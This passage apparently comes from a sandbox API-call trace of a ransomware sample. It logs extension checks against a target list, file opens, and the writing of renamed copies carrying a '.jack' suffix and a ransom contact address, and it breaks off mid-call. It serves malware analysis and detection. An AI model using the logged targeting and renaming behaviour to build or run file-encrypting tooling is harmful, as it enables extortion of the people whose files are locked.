lstrlenW (lpString=".jpg") returned 4 [0199.572] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0199.572] lstrcmpiW (lpString1=".htm", lpString2=".jack") returned -1 [0199.572] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0199.572] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0199.582] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=237) returned 1 [0199.582] CloseHandle (hObject=0x420) returned 1 [0199.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm")) returned 0x20 [0199.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.582] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0199.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0199.582] lstrlenW (lpString=".doc") returned 4 [0199.582] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0199.582] lstrlenW (lpString=".docx") returned 5 [0199.582] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0199.582] lstrlenW (lpString=".pdf") returned 4 [0199.582] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0199.582] lstrlenW (lpString=".xls") returned 4 [0199.582] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0199.582] lstrlenW (lpString=".xlsx") returned 5 [0199.583] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0199.583] lstrlenW (lpString=".ppt") returned 4 [0199.583] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0199.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0199.583] lstrlenW (lpString=".zip") returned 4 [0199.583] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0199.583] lstrlenW (lpString=".rar") returned 4 [0199.583] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0199.583] lstrlenW (lpString=".bz2") returned 4 [0199.583] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0199.583] lstrlenW (lpString=".7z") returned 3 [0199.583] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0199.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0199.583] lstrlenW (lpString=".dbf") returned 4 [0199.583] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0199.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0199.583] lstrlenW (lpString=".1cd") returned 4 [0199.583] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0199.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0199.583] lstrlenW (lpString=".jpg") returned 4 [0199.583] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0199.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0199.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0199.583] lstrlenW (lpString=".doc") returned 4 [0199.583] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0199.583] lstrlenW (lpString=".docx") returned 5 [0199.583] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0199.583] lstrlenW (lpString=".pdf") returned 4 [0199.583] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0199.583] lstrlenW (lpString=".xls") returned 4 [0199.584] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0199.584] lstrlenW (lpString=".xlsx") returned 5 [0199.584] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0199.584] lstrlenW (lpString=".ppt") returned 4 [0199.584] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0199.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0199.584] lstrlenW (lpString=".zip") returned 4 [0199.584] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0199.584] lstrlenW (lpString=".rar") returned 4 [0199.584] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0199.584] lstrlenW (lpString=".bz2") returned 4 [0199.584] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0199.584] lstrlenW (lpString=".7z") returned 3 [0199.584] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0199.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0199.584] lstrlenW (lpString=".dbf") returned 4 [0199.584] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0199.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0199.584] lstrlenW (lpString=".1cd") returned 4 [0199.584] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0199.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm") returned 75 [0199.584] lstrlenW (lpString=".jpg") returned 4 [0199.584] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0199.584] lstrcmpiW (lpString1=".jpg", lpString2=".jack") returned 1 [0199.585] lstrlenW (lpString="HandPrints.jpg") returned 14 [0199.585] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0199.623] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=4222) returned 1 [0199.623] CloseHandle (hObject=0x404) returned 1 [0199.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg")) returned 0x20 [0199.624] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.628] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0199.675] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0199.675] lstrlenW (lpString=".doc") returned 4 [0199.675] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0199.675] lstrlenW (lpString=".docx") returned 5 [0199.675] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0199.675] lstrlenW (lpString=".pdf") returned 4 [0199.675] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0199.675] lstrlenW (lpString=".xls") returned 4 [0199.676] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0199.676] lstrlenW (lpString=".xlsx") returned 5 [0199.676] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0199.676] lstrlenW (lpString=".ppt") returned 4 [0199.676] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0199.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0199.676] lstrlenW (lpString=".zip") returned 4 [0199.676] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0199.676] lstrlenW (lpString=".rar") returned 4 [0199.676] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0199.676] lstrlenW (lpString=".bz2") returned 4 [0199.676] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0199.676] lstrlenW (lpString=".7z") returned 3 [0199.676] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0199.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0199.676] lstrlenW (lpString=".dbf") returned 4 [0199.676] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0199.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0199.676] lstrlenW (lpString=".1cd") returned 4 [0199.676] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0199.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0199.676] lstrlenW (lpString=".jpg") returned 4 [0199.676] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0199.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0199.676] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0199.676] lstrlenW (lpString=".doc") returned 4 [0199.677] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0199.677] lstrlenW (lpString=".docx") returned 5 [0199.677] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0199.677] lstrlenW (lpString=".pdf") returned 4 [0199.677] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0199.677] lstrlenW (lpString=".xls") returned 4 [0199.677] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0199.677] lstrlenW (lpString=".xlsx") returned 5 [0199.677] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0199.677] lstrlenW (lpString=".ppt") returned 4 [0199.677] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0199.677] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0199.677] lstrlenW (lpString=".zip") returned 4 [0199.677] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0199.677] lstrlenW (lpString=".rar") returned 4 [0199.677] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0199.677] lstrlenW (lpString=".bz2") returned 4 [0199.677] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0199.677] lstrlenW (lpString=".7z") returned 3 [0199.677] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0199.677] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0199.677] lstrlenW (lpString=".dbf") returned 4 [0199.677] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0199.677] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0199.677] lstrlenW (lpString=".1cd") returned 4 [0199.677] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0199.677] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 72 [0199.677] lstrlenW (lpString=".jpg") returned 4 [0199.678] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0199.678] lstrcmpiW (lpString1=".htm", lpString2=".jack") returned -1 [0199.678] lstrlenW (lpString="Soft Blue.htm") returned 13 [0199.678] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0199.692] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=232) returned 1 [0199.698] CloseHandle (hObject=0x404) returned 1 [0199.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm")) returned 0x20 [0199.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 71 [0199.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 71 [0199.712] lstrlenW (lpString=".doc") returned 4 [0199.712] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0199.712] lstrlenW (lpString=".docx") returned 5 [0199.712] lstrcmpiW (lpString1=".docx", lpString2="e.htm") returned -1 [0199.712] lstrlenW (lpString=".pdf") returned 4 [0199.712] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0199.712] lstrlenW (lpString=".xls") returned 4 [0199.712] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0199.712] lstrlenW (lpString=".xlsx") returned 5 [0199.712] lstrcmpiW (lpString1=".xlsx", lpString2="e.htm") returned -1 [0199.712] lstrlenW (lpString=".ppt") returned 4 [0199.713] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0199.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 71 [0199.713] lstrlenW (lpString=".zip") returned 4 [0199.713] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0199.713] lstrlenW (lpString=".rar") returned 4 [0199.713] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0199.713] lstrlenW (lpString=".bz2") returned 4 [0199.713] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0199.713] lstrlenW (lpString=".7z") returned 3 [0199.713] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0199.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 71 [0199.713] lstrlenW (lpString=".dbf") returned 4 [0199.713] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0199.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 71 [0199.713] lstrlenW (lpString=".1cd") returned 4 [0199.713] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0199.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 71 [0199.713] lstrlenW (lpString=".jpg") returned 4 [0199.713] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0199.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 71 [0199.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 71 [0199.713] lstrlenW (lpString=".doc") returned 4 [0199.713] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0199.713] lstrlenW (lpString=".docx") returned 5 [0199.713] lstrcmpiW (lpString1=".docx", lpString2="e.htm") returned -1 [0199.713] lstrlenW (lpString=".pdf") returned 4 [0199.713] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0199.714] lstrlenW (lpString=".xls") returned 4 [0199.714] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0199.714] lstrlenW (lpString=".xlsx") returned 5 [0199.714] lstrcmpiW (lpString1=".xlsx", lpString2="e.htm") returned -1 [0199.714] lstrlenW (lpString=".ppt") returned 4 [0199.714] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0199.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 71 [0199.714] lstrlenW (lpString=".zip") returned 4 [0199.714] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0199.714] lstrlenW (lpString=".rar") returned 4 [0199.714] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0199.714] lstrlenW (lpString=".bz2") returned 4 [0199.714] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0199.714] lstrlenW (lpString=".7z") returned 3 [0199.714] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0199.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 71 [0199.714] lstrlenW (lpString=".dbf") returned 4 [0199.714] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0199.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 71 [0199.714] lstrlenW (lpString=".1cd") returned 4 [0199.714] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0199.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm") returned 71 [0199.714] lstrlenW (lpString=".jpg") returned 4 [0199.714] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0199.715] lstrcmpiW (lpString1=".inc", lpString2=".jack") returned -1 [0199.715] lstrlenW (lpString="adovbs.inc") returned 10 [0199.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0199.815] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=15195) returned 1 [0199.815] CloseHandle (hObject=0x3d4) returned 1 [0199.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc")) returned 0x20 [0199.815] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0199.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0199.816] lstrlenW (lpString=".doc") returned 4 [0199.816] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0199.817] lstrlenW (lpString=".docx") returned 5 [0199.817] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0199.817] lstrlenW (lpString=".pdf") returned 4 [0199.817] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0199.817] lstrlenW (lpString=".xls") returned 4 [0199.817] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0199.817] lstrlenW (lpString=".xlsx") returned 5 [0199.817] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0199.817] lstrlenW (lpString=".ppt") returned 4 [0199.817] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0199.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0199.817] lstrlenW (lpString=".zip") returned 4 [0199.817] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0199.817] lstrlenW (lpString=".rar") returned 4 [0199.817] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0199.817] lstrlenW (lpString=".bz2") returned 4 [0199.817] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0199.817] lstrlenW (lpString=".7z") returned 3 [0199.817] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0199.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0199.817] lstrlenW (lpString=".dbf") returned 4 [0199.817] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0199.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0199.817] lstrlenW (lpString=".1cd") returned 4 [0199.817] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0199.817] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0199.817] lstrlenW (lpString=".jpg") returned 4 [0199.817] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0199.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0199.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0199.818] lstrlenW (lpString=".doc") returned 4 [0199.818] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0199.818] lstrlenW (lpString=".docx") returned 5 [0199.818] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0199.818] lstrlenW (lpString=".pdf") returned 4 [0199.818] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0199.818] lstrlenW (lpString=".xls") returned 4 [0199.818] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0199.818] lstrlenW (lpString=".xlsx") returned 5 [0199.818] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0199.818] lstrlenW (lpString=".ppt") returned 4 [0199.818] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0199.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0199.818] lstrlenW (lpString=".zip") returned 4 [0199.818] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0199.818] lstrlenW (lpString=".rar") returned 4 [0199.818] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0199.818] lstrlenW (lpString=".bz2") returned 4 [0199.818] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0199.818] lstrlenW (lpString=".7z") returned 3 [0199.818] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0199.818] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0199.818] lstrlenW (lpString=".dbf") returned 4 [0199.818] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0199.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0199.819] lstrlenW (lpString=".1cd") returned 4 [0199.819] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0199.819] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0199.819] lstrlenW (lpString=".jpg") returned 4 [0199.819] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0199.819] lstrcmpiW (lpString1=".gif", lpString2=".jack") returned -1 [0199.819] lstrlenW (lpString="splash@2x.gif") returned 13 [0199.819] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0199.936] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=15276) returned 1 [0199.936] CloseHandle (hObject=0x420) returned 1 [0199.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif")) returned 0x20 [0199.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.936] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0199.936] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.936] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.936] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0199.937] GetLastError () returned 0x0 [0199.937] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x3bac, lpOverlapped=0x0) returned 1 [0201.331] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x3bb0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x3bb0, lpOverlapped=0x0) returned 1 [0201.332] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.333] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xee, lpOverlapped=0x0) returned 1 [0201.333] SetEndOfFile (hFile=0x404) returned 1 [0201.333] CloseHandle (hObject=0x404) returned 1 [0201.334] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, 